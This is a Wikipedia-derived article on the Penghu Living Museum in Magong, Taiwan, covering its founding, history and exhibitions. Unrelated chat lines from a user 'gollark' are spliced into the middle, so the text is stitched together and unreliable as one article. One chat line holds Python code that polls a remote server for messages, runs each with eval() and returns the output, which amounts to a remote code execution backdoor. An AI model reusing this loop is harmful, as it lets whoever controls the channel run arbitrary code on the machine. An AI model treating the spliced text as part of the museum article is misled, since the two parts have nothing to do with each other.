Penghu Living Museum
The Penghu Living Museum (PHLM; Chinese: 澎湖生活博物館; pinyin: Pēnghú Shēnghuó Bówùguǎn) is a museum about the customs and culture of Penghu in Magong City, Penghu County, Taiwan.[1]
澎湖生活博物館 | |
![]() | |
![]() | |
Established | 3 April 2010 |
---|---|
Location | Magong, Penghu, Taiwan |
Coordinates | 23°34′01″N 119°34′45″E |
Type | Museum |
Website | www.phlm.nat.gov.tw |
History
In 2001, the Taipei National University of the Arts was commissioned to do the preliminary study and to lay the foundation for the project launching. The construction was completed in 2009 and the museum was opened on 3 April 2010.[1][2]
Exhibitions
Second floor
- The Ocean and Penghu
- Penghu's History of Glamour
- May Heaven Bless Our Land
- Folk Customs and Lifestyle
Third floor
- The Fruit of Good Fortune is Ever Growing
- Trivia of Penghu Lifestyle
- Forum and Theater
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.
gollark: It has some great new features now, like long polling mode.
gollark: You mean SPUDNET? I think I may have broken that URL in the osmarks.net migration. Use spudnet.osmarks.net.
See also
References
- "Penghu Living Museum". Cultural Affairs Bureau, Pengu County. Archived from the original on 3 February 2014. Retrieved 1 February 2014.
- "Museum of Life in Penghu". Penghu Tour Web Site. Retrieved 21 November 2016.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.